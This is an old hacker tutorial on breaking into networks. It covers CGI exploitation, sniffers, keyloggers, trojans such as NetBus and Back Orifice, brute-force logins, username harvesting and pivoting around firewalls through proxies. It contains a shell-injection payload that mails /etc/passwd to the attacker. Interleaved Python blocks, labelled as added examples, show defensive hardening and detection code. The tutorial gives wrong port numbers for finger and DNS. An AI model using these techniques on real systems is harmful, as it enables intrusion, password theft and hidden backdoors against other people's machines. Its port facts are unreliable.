Elite Hacker Tactics
Up to this point, you've learned the basics of various NOSs and how the Internet works. "When will we get to the core hacking stuff?" You have been: breaking into a system is nothing more than understanding it thoroughly, knowing the 'rules', what you can and can't do. Hacking is taking what you know and using that to circumvent the usually half-hearted attempts to keep casual onlookers from being where they aren't supposed to be. Your most powerful weapon is a broad knowledge of computers and networks, and thorough knowledge of your target. Meaning: go get yourself a Unix box. Now that you know the basics of hacking, I'll go into some more advanced tactics you can employ to gain access to computers on the Internet.
Service Exploitation
One of the first things you should do when you target a particular machine is telnet to every port and find out what services are running. Find out what FTP service and what POP and SMTP daemons are running (when you telnet to the appropriate port, it will usually tell you in its banner). Then go to sploit archives like www.securityfocus.com and www.roothshell.com, and subscribe to BugTraq and NT BugTraq. Look up every service/daemon you find, as well as the operating system. Most exploits are in C, so you'll need to put a Linux partition on your hard drive to get them to compile and run. If you have problems compiling the sploits, brush up on your UNIX C utilities. Look in the manpages for cc, gcc, and make (if there is a makefile, which makes compiling the sploits lots easier).
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example, you visit your account at Hotmail. You type your username and password into the text boxes and click 'enter.' The Hotmail computer then reads what you typed and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That's CGI. Any time you interact with a website (such as a search engine) you are using CGI. CGI adds lots of functionality, and lots of security issues. There are currently all kinds of known CGI exploits. Two old ones are http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/finger. If the file in question (/cgi-bin/finger) exists and you request it, you will get a box up. In the box, type:
root ; mail [email protected] < /etc/passwd
What this does when the computer runs the script is issue the command finger (whatever you typed in the box). The ; operator starts a new command, which in this case is displaying the password file on your browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The CyberUnderground) or use one on a web site such as CyberArmy.com or infinityzone.cjb.net.
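The ';' problem in the finger CGI above, shown from the fixing side as an added example (not code from the original text): the unsafe string-building pattern next to a hardened handler that whitelists the username and never invokes a shell, plus a check a web-log reviewer could use to spot such probes. The mail address in the sample input is a constructed placeholder.

```python
import re

# Constructed inputs: a normal query and the ';' injection the text describes
# (the mail address is a placeholder, not one from the page).
NORMAL_INPUT = "root"
INJECTED_INPUT = "root ; mail hacker@example.invalid < /etc/passwd"

# Characters that /bin/sh treats specially; none of them belong in a username.
SHELL_META = set(";|&`$<>()\n")


def finger_command_unsafe(user_input):
    """The weak pattern: the form field is glued onto a command string that is
    later handed to a shell. Returned as a string here, never executed."""
    return "finger " + user_input


def shell_commands(cmdline):
    """Rough model of the shell splitting a line at ';' into separate commands."""
    return [part.strip() for part in cmdline.split(";") if part.strip()]


USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def finger_argv_safe(user_input):
    """Hardened form: whitelist the username and build an argv list so no shell
    ever parses it. The leading-character rule also blocks option injection ('-')."""
    if not USERNAME_RE.fullmatch(user_input):
        raise ValueError("rejected: not a plain username")
    return ["finger", user_input]  # hand this to subprocess.run(..., shell=False)


def looks_like_injection(user_input):
    """Detection side: flag form values carrying shell metacharacters so the
    web log reviewer sees probes even when the hardened handler rejects them."""
    return any(ch in SHELL_META for ch in user_input)


if __name__ == "__main__":
    print(shell_commands(finger_command_unsafe(INJECTED_INPUT)))
    print(finger_argv_safe(NORMAL_INPUT))
    print(looks_like_injection(INJECTED_INPUT))
```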
Another problem with CGI is that webservers that are CGI enabled have special 'CGI executable directories'. These include /cgi-bin/ (Unix), /cgi-win/, and /cgi-dos/ (Windows machines). The HTTP daemon knows to execute any file requested in those directories. Normally, when you type www.someserver.com/index.html all that is happening is the daemon sends you a copy of index.html. If you type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this process is usually exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (i.e. has a CGI file somewhere on it that can be used to gain access), you can do a number of things. Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use their built-in CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers and use a browser to scan for them manually. Doing things yourself, rather than using canned hacker tools, always provides better results along with expanding your own knowledge.
Sniffing and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target network's webserver (www.yourtarget.com) and, while trying, find a vulnerability in their mail server (mail.yourtarget.com), you have a few options for how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to check periodically. Sniffing (which is considered an elite hacker tactic), if done correctly, almost always provides results. Another option is installing a keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Check the file periodically, and you'll usually come up with a password to something else interesting. Be careful though. If you don't hide your sniffers or keyloggers well, you stand a good chance of getting busted, or at least losing any access you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address and determine whether to let you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to accept. If yours is not in that list, it will reject your connection. It's a good bet that this list contains mostly machines inside that network, or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Let's pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall. www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you won't even get a login prompt, just a 'connection failed' message. But if you telnet to www, then from there to admin, your IP address is that of www - 34.14.91.3 - which is in the same subnet as admin and will most likely be accepted. And there you have your login prompt at admin.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you'd better be elite.
Trojans
Don't assume that once you have access (be it a root shell or just user or guest access) to a computer, you always will. One good way to increase your chances of keeping access to this computer is to put in a back door of some kind. The easiest (and arguably most helpful to a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds of OSes. The two most popular are Back Orifice (BO 2000 just came out) and NetBus. Both are for Windows boxes (try RootKit for a UNIX Trojan). BO by itself is command line, but GUIs (Graphical User Interfaces) are available for it. BO has a server (that you install on your target) and a client program (that you use at home to control your target). With it, you can browse and manipulate data and directories on your target. You can send message boxes to the computer to scare people on it. NetBus, on the other hand, has more functions than BO (like screenshots of your victim, opening and closing the CD-ROM, etc.), but doesn't hide itself quite as well as BO. NetBus, like BO, has a client and a server. Though Trojans are extremely fun for scaring sysadmins, if you want to keep your access to the box, you should only use them as a backdoor.
Port Hacking
If you can't find any exploits for the daemon you've found, that doesn't mean it's not vulnerable. Theoretically, every daemon bound to a TCP port can be used as an access point to the computer's insides. Telnet to the port and interact with the daemon. At the top of your telnet window is the word 'Telnet.' As soon as it says 'Telnet - www.yourtarget.com' (or some IP address) you are connected and have established a session, whether you see text or not. Send control characters (control-x, control-c, etc.). Type commands like GET, GO, START, LOGON, INIT, etc. If what you type doesn't show up on the screen, that means the daemon isn't echoing your characters back to you - turn on your local echo so you can see what you are typing.
For example, did you know that when browsers connect to the HTTP port, they issue commands based on the URLs you request? You can do this manually - telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour across the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except that browsers parse the HTML into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the daemon based on how the user interacts with the client interface. Sometimes an initialization command needs to be issued before the daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound to the port you are hacking. Refer to the RFC on well-known ports at the end of this text.
One last note on this topic. Sometimes sysadmins, authorized users, and even other hackers will bind a daemon to some extremely high port number as a back door. Casual portscans will miss these unless they are set to scan up to high numbers. If you see port 12345 or 31337 open on some computer, someone was here before you - these are the defaults used by the NetBus and Back Orifice Trojans. Also, lazy system administrators sometimes put daemons on high port numbers that let them telnet in without a password. The moral of this story? Always scan to at least 40000.
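Added example, not from the original text: a baseline check a defender could run over `ss -tuln` style output (the sample below is constructed) that flags listeners outside the expected set, including the 12345 and 31337 defaults named above and any other high-port listener a short scan would miss.

```python
# Constructed sample in `ss -tuln` style; not taken from a real host.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:25          0.0.0.0:*
tcp   LISTEN 0      128    [::]:80             [::]:*
tcp   LISTEN 0      5      0.0.0.0:12345       0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:31337       0.0.0.0:*
tcp   LISTEN 0      5      0.0.0.0:45678       0.0.0.0:*
"""

# What this host is supposed to expose; anything else is a finding.
BASELINE = {("tcp", 22), ("tcp", 25), ("tcp", 80)}

# Default ports the text names for NetBus and Back Orifice.
KNOWN_BACKDOOR_PORTS = {12345: "NetBus default port", 31337: "Back Orifice default port"}


def parse_listeners(text):
    """Yield (proto, port) for each socket line; the header line is skipped."""
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, local = fields[0], fields[4]
        port = int(local.rsplit(":", 1)[1])  # works for 0.0.0.0:22 and [::]:80
        yield proto, port


def audit_listeners(text, baseline=BASELINE):
    """Compare live listeners with the baseline. Returns sorted findings as
    (proto, port, reason). High ports get their own reason because a scan
    that stops early would never have shown them."""
    findings = []
    for proto, port in parse_listeners(text):
        if (proto, port) in baseline:
            continue
        if port in KNOWN_BACKDOOR_PORTS:
            findings.append((proto, port, KNOWN_BACKDOOR_PORTS[port]))
        elif port > 1024:
            findings.append((proto, port, "unexpected high-port listener"))
        else:
            findings.append((proto, port, "not in baseline"))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_listeners(SAMPLE_SS_OUTPUT):
        print(*finding)
```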
Brute Force
When all else fails, you might be left with no other option than a brute force attack. This means hurling usernames and passwords at a system until it cracks. Use the list of commonly used combinations that supplements this text. Spend time trying to crack individual email addresses. Honestly, you haven't made a wholehearted brute force attempt until you've spent at least two or three hours doing nothing but trying different combinations. Since Unix login prompts won't tell you whether you've used a valid login name or not, narrow it down! Here is a quick list of how to obtain usernames:
*If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
*Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of usernames. Type HELP for more commands.
*Any email addresses on the network's website will be valid usernames.
*Look at the /etc/passwd file of any Unix machine (including one of your own). There are tons of default usernames that get used all the time.
Also, you could write a program (or a shell script if you have a Unix box yourself) to spit usernames and passwords from a dictionary wordlist file at the system (such wordlists are available all around the Net, usually as a supplement to password crackers).
If you want to become elite eventually, you'll need to learn at least a little about at least a few programming languages. The easiest (yet still effective) language to learn, especially for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly telnetted to my target and spat usernames (from a list that I compiled that I knew to be valid usernames) and passwords (from a huge dictionary file), and redirected all output to my screen and a log file. I'm no programming expert, but with an hour of coding and another of debugging, all I had to do was sit back and watch as my little proggie automated a brute force attack with decent speed. Just remember - brute force will always work, eventually.
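Added example, not from the original text: the other side of the brute-force attempt described above, detection logic over constructed sshd-style auth log lines that counts failures per source, the spread of usernames tried (the harvested-username approach the list above describes), and whether a login finally succeeded after the run.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth-log lines in syslog/sshd style; not from a real system.
SAMPLE_AUTH_LOG = """\
Mar  3 02:11:04 mail sshd[812]: Failed password for invalid user admin from 203.22.54.77 port 40112 ssh2
Mar  3 02:11:09 mail sshd[812]: Failed password for invalid user guest from 203.22.54.77 port 40113 ssh2
Mar  3 02:11:15 mail sshd[812]: Failed password for root from 203.22.54.77 port 40114 ssh2
Mar  3 02:11:21 mail sshd[812]: Failed password for root from 203.22.54.77 port 40115 ssh2
Mar  3 02:11:27 mail sshd[812]: Failed password for webmaster from 203.22.54.77 port 40116 ssh2
Mar  3 02:11:33 mail sshd[812]: Accepted password for webmaster from 203.22.54.77 port 40117 ssh2
Mar  3 02:15:40 mail sshd[901]: Failed password for alice from 34.14.91.3 port 50021 ssh2
Mar  3 02:15:52 mail sshd[901]: Accepted password for alice from 34.14.91.3 port 50022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+)"
)


def detect_bruteforce(text, threshold=5, window_seconds=300):
    """Per source IP: count failures, distinct usernames tried, and whether a login
    succeeded after the failure run. A source is flagged when it reaches `threshold`
    failures within `window_seconds`. Returns {src: summary dict}."""
    per_src = defaultdict(lambda: {"failures": 0, "users": set(), "first": None,
                                   "last": None, "success_after_failures": False})
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year; a fixed one is fine for measuring spans.
        ts = datetime.strptime("2000 " + m["ts"], "%Y %b %d %H:%M:%S")
        rec = per_src[m["src"]]
        if m["result"] == "Failed":
            rec["failures"] += 1
            rec["users"].add(m["user"])
            rec["first"] = rec["first"] or ts
            rec["last"] = ts
        elif rec["failures"] >= threshold:
            rec["success_after_failures"] = True  # the guessing paid off: investigate
    report = {}
    for src, rec in per_src.items():
        span = (rec["last"] - rec["first"]).total_seconds() if rec["first"] else 0
        report[src] = {
            "failures": rec["failures"],
            "distinct_users": len(rec["users"]),
            "flagged": rec["failures"] >= threshold and span <= window_seconds,
            "success_after_failures": rec["success_after_failures"],
        }
    return report


if __name__ == "__main__":
    for src, summary in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(src, summary)
```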
Firewall Penetration
Ahh, firewalls. Technology with only one purpose - keeping hackers out. Many newbies are intimidated by a system they know has a firewall, and don't even bother. Technically, though, every network has a firewall. A firewall, by definition, is nothing more than a system used to secure the network. Nothing specific, just that and nothing more. So if all that is blocking a network from outside access is a UNIX login prompt, that is its firewall. Generally speaking, though, when we refer to a firewall, there are a few distinct levels. Here I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet and find three computers, do you think that those are the only three computers on that network? Not usually. Every network that is connected to the Internet is connected via a complex piece of hardware known as a router. Routers route packets of data based on the source IP address of the sending machine and the destination IP address of the receiving machine. Similarly, routers can block certain IP addresses. Every packet of data sent to any computer in your target network must pass through the router connecting the two, and if the router is programmed not to let connections be made to one particular computer, it will discard all packets sent to it, thus blocking you from connecting to it. Also, routers can be set up to allow connections to certain machines but block certain port numbers. So if you scan a machine that has an open port 23 but is being blocked by the router, you won't be able to establish a connection. It is rare, though, that routers are configured to disallow connections from all IP addresses. Generally, a router will allow a select number of IP addresses through, like affiliate companies or different networks of the same company. So how do you penetrate a firewall router that won't let you through? Masquerade as a trusted computer. Bounce your connection off a computer that the router might let by. For example, let's say you hacked an account on the webserver (port 23 was not blocked). That's not enough for you - you want root on the hub computer of the network. But port 23 is blocked on it. You might connect to the webserver, then, from it, telnet to your target machine. Chances are the router will let you connect - why wouldn't it let a computer from its own network connect?
Any computer that is blocked by an IP-filtering router is said to be behind the firewall. Any that is not blocked is said to be in front of the firewall. There are a number of computers that cannot be behind a firewall. The web server, for example. How could people get the web page of your target if it was blocked? Also, mail servers have to be in front of the firewall, so that emails aren't blocked and get sent to the appropriate recipient. Name servers (computers with port 59, DNS, open) also cannot be blocked, as they are the computers that translate names (such as www.microsoft.com) into a network IP address. The trick to connecting to a computer blocked by a packet-filtering router is to masquerade as a computer in a trusted network, or as a computer in front of the firewall.
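Added example, not from the original text, modelling the Leapfrogging section's scenario and the router rules just described with Python's ipaddress module: a rule set that trusts the local subnet lets a connection bounced through www reach admin, while a rule set that treats the public web server as an untrusted source does not. The management network 34.14.92.0/28 and the host 34.14.92.2 are assumptions, not from the text.

```python
from ipaddress import ip_address, ip_network

# Hosts from the text's Leapfrogging example.
OUTSIDER = ip_address("203.22.54.77")
WWW = ip_address("34.14.91.3")
ADMIN = ip_address("34.14.91.15")
ANY = ip_network("0.0.0.0/0")
SITE = ip_network("34.14.91.0/24")
# Constructed: a separate management network that is the only legitimate admin source.
MGMT = ip_network("34.14.92.0/28")
MGMT_HOST = ip_address("34.14.92.2")

# Rule = (source network, destination host, port, action); first match wins, default deny.
WEAK_RULES = [
    (ANY, WWW, 23, "allow"),     # telnet to the web server is open to the world
    (SITE, ADMIN, 23, "allow"),  # "same subnet is trusted" - the flaw the text relies on
]
HARDENED_RULES = [
    (ANY, WWW, 80, "allow"),     # the web server only needs to serve HTTP publicly
    (MGMT, WWW, 23, "allow"),    # remote administration only from the management net
    (MGMT, ADMIN, 23, "allow"),
    (SITE, ADMIN, 23, "deny"),   # explicit: a compromised public host is not a trusted source
]


def evaluate(rules, src, dst, port):
    """Return the action of the first matching rule, or 'deny' if none matches."""
    for net, host, rule_port, action in rules:
        if src in net and dst == host and port == rule_port:
            return action
    return "deny"


def reachable_via_pivot(rules, attacker, pivot, target, port):
    """The leapfrog from the text: hop 1 reaches the pivot, hop 2 is made from the
    pivot's own address. Both hops must be allowed for the chain to work."""
    first = evaluate(rules, attacker, pivot, port)
    second = evaluate(rules, pivot, target, port)
    return first == "allow" and second == "allow"


if __name__ == "__main__":
    print("direct:", evaluate(WEAK_RULES, OUTSIDER, ADMIN, 23))
    print("via www (weak rules):", reachable_via_pivot(WEAK_RULES, OUTSIDER, WWW, ADMIN, 23))
    print("via www (hardened rules):", reachable_via_pivot(HARDENED_RULES, OUTSIDER, WWW, ADMIN, 23))
```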
There are other ways to masquerade as a computer from inside your target network to pass through a firewall. What if your target machine is an NT Server? There is no telnet daemon. Well, if there are NT servers on the network, there will be NT Workstations and Windows 9x boxes too. And those machines will probably have Internet access. How do they connect to the Internet? Via a proxy server - all HTTP requests are directed to the designated proxy server, which requests the URL for them, gets it from whatever webserver the web page is on, and sends it back to the workstation inside the internal network that originally requested it. Remember that when computers surf the Internet via a proxy server, their IP address (to the Internet) is that of the proxy server (read the 'keeping from getting caught' section for more details on how this works, or check the definition of 'proxy server' at the beginning of this text). So how do you connect to a web page on an internal computer that is blocked by the router? Connect via the network's proxy server. If a proxy server exists (which one will, 99% of the time), it cannot be blocked by a firewall - how would the requested web pages be sent back to it if it were? Okay, so we know that one of the computers that turned up on a subnet scan is probably a proxy server. Your next step is to use it to make connections for you. Go to your Netscape or Internet Explorer settings, and select 'proxies.' (Note: the proxy settings in your Internet Preferences or Control Panel only work if you are physically connected to a proxy server, meaning on the same LAN as it.) For HTTP ports, try 80, 8080, 88, and 8888. For FTP, try 21, 2121, etc. It's less common, though, for proxy servers to be set up to handle FTP proxying. So for each computer you found on the subnet, enter it as a proxy server in your browser settings, hit 'Okay,' and then just request any web page. www.hackers.com, or whatever.
On the bottom of your screen, you will see your browser attempting to connect to the proxy server. If you get an error message, the computer is not a proxy server, or you specified the wrong port number (try some others). If the web page you requested shows up in your browser - congratulations, you connected to the proxy. Now request pages (or an FTP session) from a computer behind the firewall - chances are it will let you in, since your IP address is now the proxy server's when making connections with the protocol you specified to use proxies for (and again, firewalls generally allow connections from computers on their own network). Now, proxy servers will allow computers to use them as a proxy based on a set of criteria. These are:
*Always - any computer connecting will be allowed to use this proxy (known as a public proxy)
*Depending on who connects to it, i.e.: the IP address of the connecting computer, or
*If the connecting computer can validate itself with a username and password
If you are prompted with a username and password request, you are not out of luck. Get yourself Web Crack, enter the proxy server as the target machine, and launch an attack. Proxy server authentication is exactly the same as password protection of private web pages, and Web Crack will brute force until it's let in. Once you find a valid username and password combo, you will be able to use the proxy. Now connect to the computer blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class A) networks are private, and if you try to connect (telnet, http, whatever) to one of these addresses, the address will not resolve (i.e. you won't be able to connect). Oftentimes companies will buy a range of private IP addresses in order to keep hackers out. This is another form of a firewall. However, if the company wants their network connected to the Internet in any fashion (for their workstations to be able to surf, or for email, or whatever), at least one computer has to have a public IP address, meaning an IP address that the Internet (and therefore you) can connect to. This computer is a proxy server of sorts, and generally has two Network Interface Cards (adapters used to connect network cable to), one with one of the private addresses and one with a public address. This 'public' computer, being the specialized proxy server, will (unlike your computer, and any other on the Internet) understand the private address. So to connect to the 10.x.x.x (or whatever private address your target uses internally), you'll need to connect to the proxy server. If it's a Unix machine, you'll have to get an account with telnet access, and telnet from it to your destination. If it's a Windows machine, you'll have to use the proxying method explained above.
Since the proxy server is the only computer on the entire Internet that is able to connect to the private network protected by this type of setup, you will have to connect through it. One other option is hacking into it and installing a port redirector program. For example: if you can install NetBus onto the computer, you can set it to redirect all connections made to a port you specify to another address. So let's say when you try to connect to 10.2.56.14 (reserved) with telnet, you get a 'failed to resolve address' message, meaning that address is not on the Internet, and neither your computer nor any other on the Internet understands that address. But you know that 204.56.87.5 (an address that is on the Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You break in, install NetBus, and set the port redirector to 10.2.56.14. Next, telnet to 204.56.87.5 (on the port you specified to be redirected) and, since 204.56.87.5 knows where 10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penetrated another firewall.
In Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you should have learned just how much you're going to have to learn to become a proficient hacker. You'll need to learn more about various protocols and about different operating systems. Learning programming languages such as C or Perl would definitely help you. There are a lot of programs out there, but most do the same as their legitimate counterparts would do, and don't allow much room for fine tuning. Imagine the power in the ability to write a target-specific program to aid you in hacking it! Anyway, I also strongly suggest installing Linux on your machine. Unix is more powerful (and therefore more complex) than DOS and Windows, and the only way you'll learn anything about it is to have it (not to mention raw sockets!). Even a book wouldn't be of much use if you had nothing to apply what you've learned on. When faced with a challenge that you don't quite understand, fumble your way through. Try not to ask for help all the time. You'll learn a lot more that way - and not just about the obstacle in question. In closing, let me say that you should never decide that you know enough. An unquenchable thirst for knowledge is what drives the real hacker. The process, not the end results.
"What do you want to hack today?"
< Kurruppt2k >